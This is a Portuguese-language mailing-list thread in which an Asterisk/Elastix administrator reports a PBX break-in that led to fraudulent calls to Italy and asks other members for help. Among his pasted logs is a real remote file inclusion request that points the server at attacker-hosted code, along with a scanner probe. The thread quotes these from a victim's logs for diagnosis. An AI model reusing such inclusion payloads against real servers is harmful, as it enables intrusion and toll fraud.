Nielsen, Cara, rodei tudo quanto é coisa na maquina do cliente, essa parte foi facil, até porque só tem uma maquina em cada filial, nao detectei nada, até porque tem um firewall que barra tudo quanto é acesso, mais enfim o fato é que eu gostaria de saber, o que posso fazer pra tornar mais seguro pra evitar essas invasões.
Att; Gleidison C. Sampaio From: niel...@freesolutions.com.br Date: Mon, 22 Nov 2010 13:51:04 -0300 To: asteriskbrasil@listas.asteriskbrasil.org Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Bom eles autenticaram numa boa ? Vc está utilizando senhas fortes ? provavelmente eles monitoraram seu server e conseguiram uma senha ... Muito estranho vc fez uma auditoria nos logs ? Pode ser que algum de seus clientes esteja com trojan, este enviou as informações e no meio delas foram os dados de autenticação. Pensou nisso tudo ? No final das contas é preciso a auditoria para identificar a origem da invasão. Em 22 de novembro de 2010 13:40, Gleidison Sampaio <gleidison.samp...@hotmail.com> escreveu: Sim no Elastix 1.6 ele se encontra em um Co-location dentro da GVT em uma maquina virtual, com IP Publico e tenho ramais distribuidos em 5 filiais diferentes, esses ramais estao logados atraves de Linksys SPA2102 todos estes atras de Firewall, e o que notei no CDR foi que fizeram ligaçoes apenas um ramal, e em duas horas durante a madrugada os caras arrebentaram de ligar. 2010-11-21 21:14:01 XXXX00393396976261 SIP/TRUNK SIP/TRUNKANSWERED 1045 Att; Gleidison C. Sampaio From: niel...@freesolutions.com.br Date: Mon, 22 Nov 2010 13:27:16 -0300 To: asteriskbrasil@listas.asteriskbrasil.org Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Opa, foi no seu ELASTIX 1.6? Qual a posição que se encontra seu servidor voip na sua rede ? Em 22 de novembro de 2010 13:20, Gleidison Sampaio <gleidison.samp...@hotmail.com> escreveu: Sidinei, Obrigado pela Resposta, cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. alguem poderia me ajudar a bloquear isso. /var/log/httpd/access_log 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner" 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1" 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" Att; Gleidison C. Sampaio From: sidnei...@ig.com.br To: asteriskbrasil@listas.asteriskbrasil.org Date: Mon, 22 Nov 2010 14:00:10 -0200 Subject: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Não, pois estão todas as linhas comentadas (é só um exemplo). De: asteriskbrasil-boun...@listas.asteriskbrasil.org [mailto:asteriskbrasil-boun...@listas.asteriskbrasil.org] Em nome de Gleidison Sampaio Enviada em: segunda-feira, 22 de novembro de 2010 13:40 Para: Asterisk Lista Assunto: [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6 Boa tarde Lista! hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, e gostaria de saber se isso da permissao a algum acesso no meu servidor /etc/asterisk/users.conf ;[6000] ;fullname = Joe User ;email = j...@foo.bar ;secret = xxxx ;zapchan = 1 ;hasvoicemail = yes ;vmsecret = xxxx ;hassip = yes ;hasiax = no ;hash323 = no ;hasmanager = no ;callwaiting = no ;context = international Att; Gleidison C. Sampaio
_______________________________________________ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br _______________________________________________ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br ______________________________________________ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil ______________________________________________ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
